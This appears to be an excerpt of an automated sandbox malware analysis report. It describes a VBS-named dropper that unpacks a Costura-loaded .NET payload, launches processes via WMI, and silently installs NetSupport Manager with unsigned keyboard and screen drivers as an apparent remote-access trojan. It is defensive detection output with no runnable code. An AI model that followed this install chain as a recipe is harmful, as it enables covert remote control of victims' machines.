                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\x64\Release\CloseHookApp64.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\PCICTL.pdb source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpJD source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\nsmsrc\nsm1201f\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbUGP source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: D:\nsmsrc\ReProcessWindowshortcuts\Release\ReProcessWindowshortcuts.pdb source: wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000002.115176196956.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000020.00000000.114260013532.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000002.115175806998.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000000.114272266016.00000000001F2000.00000002.00000001.01000000.00000015.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpcD source: MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pcihtmlgen\Release_unicode\PCIHTMLGen.pdb source: PCIhtmlgen.dll.20.dr
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdb source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\htctl32.pdb source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000022.00000002.114281184741.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000022.00000000.114273328544.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000023.00000002.114274483585.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: msvcp100.i386.pdb source: client32.exe, 00000020.00000002.115191046027.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000021.00000002.115191046071.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, pcicfgui_client.exe, 00000022.00000002.114306646393.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000020.00000002.115187020346.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, client32.exe, 00000021.00000002.115187219936.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, pcicfgui_client.exe, 00000022.00000002.114306116329.000000006CA21000.00000020.00000001.01000000.00000019.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcichek.pdb source: client32.exe, 00000020.00000002.115191428864.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, client32.exe, 00000021.00000002.115191432453.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, pcicfgui_client.exe, 00000022.00000002.114307056768.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp
                                Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\DllWrap.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B4B6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: NETSUPPORT LTD.NetSupport Ltd.url.pdb.dllpreprocessing %s source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: DisableGeolocationEnableStopClientpcicl32.pdbSSLDefCertrootcert.pemSSLCertDirRootCertsshareFilecic/setup.msicic/setup.execic/delta.zipCICshareVershareTypeInstalledBytracerecvtracesendNoAckWhenInRoomlimitcolorbitsWinHttpWiredNetworkSpeedWebSocketSSLOnlySSLDisconnectTimeoutSilentImageFilecic_lock_image.jpgImpersonateCurrentUserdetected TS feature source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdbUGP source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb source: client32.exe, 00000021.00000002.115186530049.000000006C61A000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\cryptpak\Release\CryptPak.pdb source: client32.exe, 00000020.00000002.115186693309.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp, client32.exe, 00000021.00000002.115186891711.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\client32\release_unicode\PCICL32.pdb source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: e:\nsmsrc\nsm\1250\1250\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 00000020.00000002.115185842993.000000006C8F5000.00000002.00000001.01000000.0000001D.sdmp

                                Data Obfuscation

                                barindex
                                .NET source code contains potential unpacker
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, ListDecorator.cs.Net Code: Read
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                                Yara detected Costura Assembly Loader
                                Source: Yara matchFile source: 4.2.Pyyidau.vbs.exe.fc00000.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.114071601161.000000000FC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D5490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,25_2_005D5490
                                Source: nspscr.sys.20.drStatic PE information: section name: PAGEABLE
                                Source: mfc140u.dll.20.drStatic PE information: section name: .didat
                                Source: libssl-1_1.dll.20.drStatic PE information: section name: .00cfg
                                Source: libcrypto-1_1.dll.20.drStatic PE information: section name: .00cfg
                                Source: msvcp140.dll.20.drStatic PE information: section name: .didat
                                Source: pcictl.dll.20.drStatic PE information: section name: .nsld
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1CF1 pushad ; retn 006Bh4_2_04EA1CF2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1CAF pushad ; retn 006Bh4_2_04EA1CE2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1D87 pushad ; retn 006Bh4_2_04EA1DB2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1D00 pushad ; retn 006Bh4_2_04EA1D02
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_099735EC push ds; retf 4_2_099735EF
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_006064CF push ecx; ret 25_2_006064E2
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005EDD05 push ecx; ret 25_2_005EDD18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009464CF push ecx; ret 27_2_009464E2
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092DD05 push ecx; ret 27_2_0092DD18
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007880C5 push ecx; ret 28_2_007880D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A04BF push ecx; ret 28_2_007A04D2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_010164CF push ecx; ret 29_2_010164E2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FFDD05 push ecx; ret 29_2_00FFDD18
                                Source: msvcr100.dll.20.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Creates processes via WMI
                                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Drops executables to the windows directory (C:\Windows) and starts them
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF985.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF373.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI1387.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI23E6.tmpJump to behavior
                                Sample is not signed and drops a device driver
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3741.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF985.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6B9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE46.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE748.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9FC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF373.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF691.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBAA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDC7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA9C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE5EC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF179.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF0BB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9CD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF314.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB6B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE98D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF710.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA2C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF869.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1387.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBEA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF2D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2955.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF8D7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB3B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE94E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEEB5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE06.tmpJump to dropped file
